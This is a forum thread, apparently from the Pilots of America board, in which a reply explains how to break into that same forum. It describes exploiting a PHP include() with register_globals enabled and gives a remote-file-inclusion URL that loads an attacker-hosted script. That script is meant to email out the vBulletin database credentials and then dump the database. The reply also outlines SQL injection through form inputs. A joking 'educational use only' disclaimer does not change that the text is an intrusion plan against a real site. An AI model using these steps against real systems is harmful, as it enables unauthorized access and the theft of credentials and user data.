I was thinking it'd be interesting to see the most ignored/buddied poster on PoA.
Can you do that, and if so, would you? Seems it would be fun.
I think you'd have to do that on your own. Find an include() function in one of the weak extensions to this forum. Flash Chat or some other thing Chuck added would be a good start. If you could find an include that uses a variable for example:
Code:
$script=fancyscript.php
include($script);
That is the EASIEST thing to look for in php (ideally you'll need the source to do this, buy it). If you see something like that you can almost *COUNT* on most web servers being setup crappy with register_globals on. If that's the case you can just pass a new script via the URL.
Once you find this you just setup a file on your web server.
call it.. executepoa.php
You could put anything you want in there that would exceute on the POA server. It would be *very* simple to write a script that would e-mail the configuration file for Vbulletin that holds the database username/password.
Now you just trick the POH script into executing it by doing something like this:
Code:
http://www.pilotsofamerica.com/flashchat.php?script=http://www.nickswebsite.com/executepoa.php
Now you just reassigned that script variable (like i said i bet register globals is on which is what makes this possible) to inject your own code into the POA code.
Once you get the database username and password it would be simple to modify your code injection to dump the database into a compressed file to e-mail to yourself.
Or you could always just go with the classic SQL injection which is also pretty easy most of the time. More or less you just need some type of form input box. If you can get that with some patience (really helps to have the source code to look at) you can write an SQL query inside that box. That box is usually a varibles which is dropped into a database query. If you format it right you can add another query inside that query and have it format the output to display it on the following page. Figure out the formatting right and with a little luck the programmers probably didn't properly verify data input and you've got your answer to your most ignored question.
Of course--I'm sure none of this could happen since all the extensions are probably rock solid and I highly doubt a responsible system admin like Chuck would have register_globals enabled (although many php scripts depend on it being on).
I guess it just depends how bad you want to know....I'd rather do something more fun like photoshop pictures of Tony.
Void where prohibitied. Educational use only. Pure speculation. Do any of this and CowboyPilot and Chuck will kick your ass.. Blah Blah Legal crap.
